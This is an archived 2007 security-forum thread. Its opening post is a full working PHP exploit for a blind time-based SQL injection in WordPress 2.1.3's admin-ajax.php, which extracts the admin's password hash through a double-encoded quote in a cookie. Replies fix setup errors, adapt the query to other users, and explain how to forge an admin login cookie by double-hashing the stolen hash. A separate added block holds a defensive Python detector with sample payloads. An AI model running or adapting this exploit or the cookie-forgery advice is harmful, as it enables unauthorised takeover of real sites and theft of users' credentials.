Waraxe IT Security Portal  
www.waraxe.us Forum Index -> All other software
WordPress 2.1.3 sql injection blind fishing exploit
Posted: Mon May 21, 2007 12:05 pm
waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

To use this exploit you need:

1. a working PHP installation
2. to run this script as PHP CLI
3. to modify the needed parameters at the beginning of the script

Code:

<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

if(empty($suffix))
{
   $suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
   $len = 32;
   $field = 'user_pass';
   $out = '';
   
   echo "finding hash now ...\n";
   
   for($i = 1; $i < $len + 1; $i ++)
   {
      $ch = get_hashchar($field,$i);
      echo "got $field pos $i --> $ch\n";
      $out .= "$ch";
      echo "current value for $field: $out \n";
   }
   
   echo "\nFinal result: $field=$out\n\n";
   
   return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
   global $prefix, $suffix, $id, $testcnt;
   $char = '';
   $cnt = $testcnt * 4;
   $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
   $ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

   // First let's determine, if it's number or letter
   $inj = sprintf($ipattern, $prefix, $id, ">57");
   $post = sprintf($ppattern, $suffix, $inj, $suffix);
   $letter = test_condition($post);
   
   if($letter)
   {
      $min = 97;
      $max = 102;
      echo "char to find is [a-f]\n";
   }
   else
   {
      $min = 48;
      $max = 57;
      echo "char to find is [0-9]\n";
   }

   $curr = 0;
   
   while(1)
   {
      $area = $max - $min;
      if($area < 2 )
      {
         $inj = sprintf($ipattern, $prefix, $id, "=$max");
         $post = sprintf($ppattern, $suffix, $inj, $suffix);
         $eq = test_condition($post);
         
         if($eq)
         {
            $char = chr($max);
         }
         else
         {
            $char = chr($min);
         }
         
         break;
      }
      
      $half = intval(floor($area / 2));
      $curr = $min + $half;
      
      $inj = sprintf($ipattern, $prefix, $id, ">$curr");
      $post = sprintf($ppattern, $suffix, $inj, $suffix);
      
      $bigger = test_condition($post);
      
      if($bigger)
      {
         $min = $curr;
      }
      else
      {
         $max = $curr;
      }

      echo "curr: $curr--$max--$min\n";
   }
   
   return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
   global $url, $norm_delay;
   $bret = false;
   $maxtry = 10;
   $try = 1;
   
   while(1)
   {
      $start = getmicrotime();
      $buff = make_post($url, $p);
      $end = getmicrotime();
   
      if($buff === '-1')
      {
         break;
      }
      else
      {
         echo "test_condition() - try $try - invalid return value ...\n";
         $try ++;
         if($try > $maxtry)
         {
            die("too many tries - exiting ...\n");
         }
         else
         {
            echo "trying again - try $try ...\n";
         }
      }
   }
   
   $diff = $end - $start;
   $delay = intval($diff * 10);
   
   if($delay > ($norm_delay * 2))
   {
      $bret = true;
   }
   
   return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
   $fa = test_md5delay(1);
   echo "$fa\n";
   $sa = test_md5delay($testcnt);
   echo "$sa\n";
   $fb = test_md5delay(1);
   echo "$fb\n";
   $sb = test_md5delay($testcnt);
   echo "$sb\n";
   $fc = test_md5delay(1);
   echo "$fc\n";
   $sc = test_md5delay($testcnt);
   echo "$sc\n";
   
   $mean_nondelayed = intval(($fa + $fb + $fc) / 3);
   echo "mean nondelayed - $mean_nondelayed dsecs\n";
   $mean_delayed = intval(($sa + $sb + $sc) / 3);
   echo "mean delayed - $mean_delayed dsecs\n";
   
   return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
   global $url, $id, $prefix, $suffix;
   
   // delay in deciseconds
   $delay = -1;
   $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
   $ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
   $inj = sprintf($ipattern, $prefix, $id, $cnt);
   $post = sprintf($ppattern, $suffix, $inj, $suffix);

   $start = getmicrotime();
   $buff = make_post($url, $post);
   $end = getmicrotime();
   
   if(intval($buff) !== -1)
   {
      die("test_md5delay($cnt) - invalid return value, exiting ...");
   }

   $diff = $end - $start;
   $delay = intval($diff * 10);

   return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
    list($usec, $sec) = explode(" ", microtime());
    return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
   $ch = curl_init();
   $timeout = 120;
   curl_setopt ($ch, CURLOPT_URL, $url);
   curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
   curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
   curl_setopt($ch, CURLOPT_POST, 1);
   curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
   curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
   
   if(!empty($cookie))
   {
      curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
   }
 
   if(!empty($referer))
   {
      curl_setopt ($ch, CURLOPT_REFERER, $referer);
   }

   if($headers === TRUE)
   {
      curl_setopt ($ch, CURLOPT_HEADER, TRUE);
   }
   else
   {
      curl_setopt ($ch, CURLOPT_HEADER, FALSE);
   }

   $fc = curl_exec($ch);
   curl_close($ch);
   
   return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
   global $outfile;
   
   $buf .= "\n";
   $fh = fopen($outfile, 'ab');
   fwrite($fh, $buf);
   fclose($fh);
   
}
///////////////////////////////////////////////////////////////////////
?>


Enjoy :)


Last edited by waraxe on Tue May 22, 2007 2:35 am; edited 1 time in total
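A defender-side check for the request shape this script produces, added here as an example and not part of waraxe's post: it decodes the POSTed cookie= field repeatedly (the %2527 trick), flags a quote inside the wordpressuser_ value together with the UNION/BENCHMARK markers, and marks responses slower than twice the median, the same "more than twice the normal delay" rule test_condition() uses to read a true answer. The sample bodies, the timings and the 32-hex SUFFIX are constructed, not captured traffic.

```python
import re
import statistics
from urllib.parse import unquote

# Constructed sample traffic (not real logs): (POST body sent to admin-ajax.php, response ms).
# SUFFIX stands in for the md5(site URL) cookie suffix the script computes; the value is made up.
SUFFIX = "0123456789abcdef0123456789abcdef"
PAYLOAD = ("xyz%2527 UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM wp_users "
           "WHERE ID=1 AND IF(ORD(SUBSTRING(user_pass,1,1))>{0},BENCHMARK(1200000,MD5(1337)),3)/*")
SAMPLE_REQUESTS = [
    (f"cookie=wordpressuser_{SUFFIX}%3dadmin; wordpresspass_{SUFFIX}%3dc4ca4238a0b923820dcc509a6f75849b", 38),
    (f"cookie=wordpressuser_{SUFFIX}%3d{PAYLOAD.format(57)}; wordpresspass_{SUFFIX}%3dp0hh", 3910),  # condition true
    (f"cookie=wordpressuser_{SUFFIX}%3d{PAYLOAD.format(102)}; wordpresspass_{SUFFIX}%3dp0hh", 41),  # condition false
    ("action=ajax-tag-search&q=security", 35),
]

SQL_MARKERS = re.compile(r"(union\s+all\s+select|benchmark\s*\(|sleep\s*\(|/\*)", re.IGNORECASE)
COOKIE_VALUE = re.compile(r"wordpressuser_[0-9a-f]{32}=([^;]*)")

def fully_decode(value, max_rounds=3):
    """Undo repeated URL encoding. The script relies on %2527 surviving one decode
    as %27 and only becoming a quote on the second, so a single-decode check
    never sees the quote."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(body):
    """Return sorted findings for one admin-ajax.php POST body; [] means nothing suspicious."""
    findings = []
    decoded = fully_decode(body)
    m = COOKIE_VALUE.search(decoded)
    if m and "'" in m.group(1):  # a quote in the user-name cookie breaks out of the SQL string
        findings.append("quote in wordpressuser cookie value")
    if "%2527" in body.lower():
        findings.append("double-encoded quote")
    for kw in set(re.sub(r"\s+", " ", k.lower()) for k in SQL_MARKERS.findall(decoded)):
        findings.append("sql marker: " + kw)
    return sorted(findings)

def slow_outliers(requests, factor=2.0):
    """Indexes of requests slower than factor x the median response time, i.e. the
    responses the timing oracle would read as 'true'."""
    baseline = statistics.median(ms for _, ms in requests)
    return [i for i, (_, ms) in enumerate(requests) if ms > baseline * factor]
```

A payload hit from classify() on a request that slow_outliers() also flags is the signature of this timing oracle; the fast variant (index 2) is still caught by the content check alone.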
Posted: Mon May 21, 2007 12:24 pm
Sm0ke (Moderator; joined Nov 25, 2006; posts: 141; location: Finland)

Excellent work again

:)
Posted: Mon May 21, 2007 11:48 pm
oxygenne (Advanced user; joined Apr 13, 2005; posts: 52)

Are the hashes salted??

Re: :)
Posted: Tue May 22, 2007 12:23 am
waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

oxygenne wrote:
Are the hashes salted??

Nope, they are good old plain md5 hashes.

Posted: Tue May 22, 2007 12:32 am
bean703 (Regular user; joined Mar 21, 2007; posts: 22)

It's not working, I keep getting this:
Quote:
PHP Fatal error: Call to undefined function curl_init() in C:\curl\test.php on line 240

Posted: Tue May 22, 2007 1:57 am
waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

bean703 wrote:
It's not working, I keep getting this:
Quote:
PHP Fatal error: Call to undefined function curl_init() in C:\curl\test.php on line 240

The cURL extension must be loaded. Look at php.ini:

Code:

extension=php_curl.dll

And the extensions directory must be defined correctly.
Example:

Code:

; Directory in which the loadable extensions (modules) reside.
extension_dir = "./ext/"

What about username, they are not all "admin" :) ?
Posted: Tue May 22, 2007 3:38 am
_-GORO-_ (Beginner; joined May 22, 2007; posts: 3)

Nice work!

What about the username? They are not all "admin" :)

UNION ALL SELECT 1,2,user_name.... ?????

Re: What about username, they are not all "admin" :) ?
Posted: Tue May 22, 2007 9:40 am
waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

_-GORO-_ wrote:
Nice work!

What about the username? They are not all "admin" :)

UNION ALL SELECT 1,2,user_name.... ?????

One way is to find out the ID which belongs to the target user.
Another way is to modify the attack query.

Orig:

Code:
WHERE ID=%d AND IF

New:

Code:
WHERE display_name=%2527waraxe25%27 AND IF

Posted: Tue May 22, 2007 11:01 am
spec (Beginner; joined May 22, 2007; posts: 4)

"your session has expired" / "incorrect password" is killing me whenever I edit the cookie to gain access, any way around this?

Excellent work

Posted: Tue May 22, 2007 11:33 am
waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

spec wrote:
"your session has expired" / "incorrect password" is killing me whenever I edit the cookie to gain access, any way around this?

Excellent work

Do you know that the cookie must contain the double-hashed password?

I mean:

md5(md5($password))

Re: What about username, they are not all "admin" :) ?
Posted: Tue May 22, 2007 11:36 am
_-GORO-_ (Beginner; joined May 22, 2007; posts: 3)

waraxe wrote:
One way is to find out the ID which belongs to the target user.
Another way is to modify the attack query.

Orig:

Code:
WHERE ID=%d AND IF

New:

Code:
WHERE display_name=%2527waraxe25%27 AND IF

Normally the ID for admin is 1, but the username is not necessarily "admin". The goal is to find out the username for a specific ID. The example you show here does the opposite. :)

Re: What about username, they are not all "admin" :) ?
Posted: Tue May 22, 2007 11:45 am
waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

I got it.

This needs some modifications to the exploit. If you are interested, then I can make an improved exploit with this additional functionality :)

_-GORO-_ wrote:
Normally the ID for admin is 1, but the username is not necessarily "admin". The goal is to find out the username for a specific ID. The example you show here does the opposite. :)

Posted: Tue May 22, 2007 11:50 am
spec (Beginner; joined May 22, 2007; posts: 4)

waraxe, I read something about that, but that's not what my WordPress gave me in my cookie whenever I log in; it just has these two lines:

Code:
www. myblog .com   FALSE   /path/   FALSE   1211319735   wordpressuser_f7f9ab0e578f2388f870c9b6a88f2999   admin
www. myblog .com   FALSE   /path/   FALSE   1211319735   wordpresspass_f7f9ab0e578f2388f870c9b6a88f2999   665e0b331c6dc4c6d747035199349fee

Ignore the spaces between the www and the path, because wp resides in a path. But how can I double the md5 hashes?

Posted: Tue May 22, 2007 12:02 pm
waraxe (Site admin; joined May 11, 2004; posts: 2407; location: Estonia, Tartu)

Is this the situation:

you want to get admin access to some target and don't have the admin's password, but you got the admin password's md5 hash from the database?
And you want to manually edit the cookies, so you can gain admin access without needing to crack the md5 hash?
If so, then just take that md5 hash you already have and hash it one more time. Put the resulting hash (or must I say "double-hash"?) in the cookie you are editing.

By the way:

http://codex.wordpress.org/WordPress_Cookies

Quote:

When you log into WordPress from http://example.com/wp-login.php, WordPress stores the following two cookies:

Your user name
A double-hashed copy of your password

Posted: Tue May 22, 2007 12:06 pm
spec (Beginner; joined May 22, 2007; posts: 4)

You're right waraxe, thanks :)